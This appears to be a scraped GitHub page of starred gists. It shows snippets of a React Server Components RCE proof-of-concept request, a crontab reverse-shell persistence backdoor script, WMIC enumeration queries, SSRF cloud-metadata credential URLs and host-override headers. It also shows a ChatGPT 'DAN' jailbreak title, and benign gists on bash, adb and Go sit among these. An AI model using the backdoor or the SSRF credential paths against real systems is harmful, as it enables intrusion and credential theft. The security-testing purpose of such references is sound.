Skip to content

Instantly share code, notes, and snippets.

View w0ltage's full-sized avatar
:shipit:
hacking myself

Artyom Bulgakov w0ltage

:shipit:
hacking myself
9 followers · 8 following
View GitHub Profile
@maple3142
maple3142 / CVE-2025-55182.http
Last active December 12, 2025 15:26
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@whoamins
whoamins / http-headers.txt
Created March 11, 2023 20:58
Host Override Headers
bae-env-addr-bcms:
bae-env-addr-bcs:
bae-env-addr-bus:
bae-env-addr-channel:
bae-env-addr-sql-ip:
bae-env-addr-sql-port:
base-url:
cache_info:
CF-Connecting-IP:
cf-connecting_ip:
@coolaj86
coolaj86 / ChatGPT-Dan-Jailbreak.md
Last active December 11, 2025 19:24
@wcarhart
wcarhart / bash_tidbits.md
Last active October 16, 2025 13:51
Helpful Bash design patterns

Helpful Bash tidbits

@AnatomicJC
AnatomicJC / android-backup-apk-and-datas.md
Last active December 11, 2025 06:30
Backup android app, data included, no root needed, with adb

Backup android app, data included, no root needed, with adb

Note: This gist may be outdated, thanks to all contributors in comments.

adb is the Android CLI tool with which you can interact with your android device, from your PC

You must enable developer mode (tap 7 times on the build version in parameters) and install adb on your PC.

Don't hesitate to read comments, there is useful tips, thanks guys for this !

@hoefler02
hoefler02 / persistence.sh
Last active December 12, 2025 01:22
Persistent Reverse Shell via Crontab
#!/bin/bash
# persistent reverse shell backdoor via crontab
# overwrites existing crontabs
(touch .tab ; echo "* * * * * reverse-shell-of-choice" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1
# keeps existing crontabs
(crontab -l > .tab ; echo "* * * * * reverse-shell-of-choice" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1
@asukakenji
asukakenji / 0-go-os-arch.md
Last active December 6, 2025 10:22
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.17.1 darwin/amd64.

GOOS Values

GOOS Out of the Box
aix
android
@xorrior
xorrior / wmic_cmds.txt
Last active October 25, 2025 16:57
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active November 26, 2025 00:24
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@theonlypwner
theonlypwner / randompng.py
Last active August 25, 2023 09:58
Random PNG generator
#!/usr/bin/env python
# Random PNG generator
__copyright__ = "Copyright (C) 2016 Victor Zheng"
__licence__ = "GNU GPL v3"
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.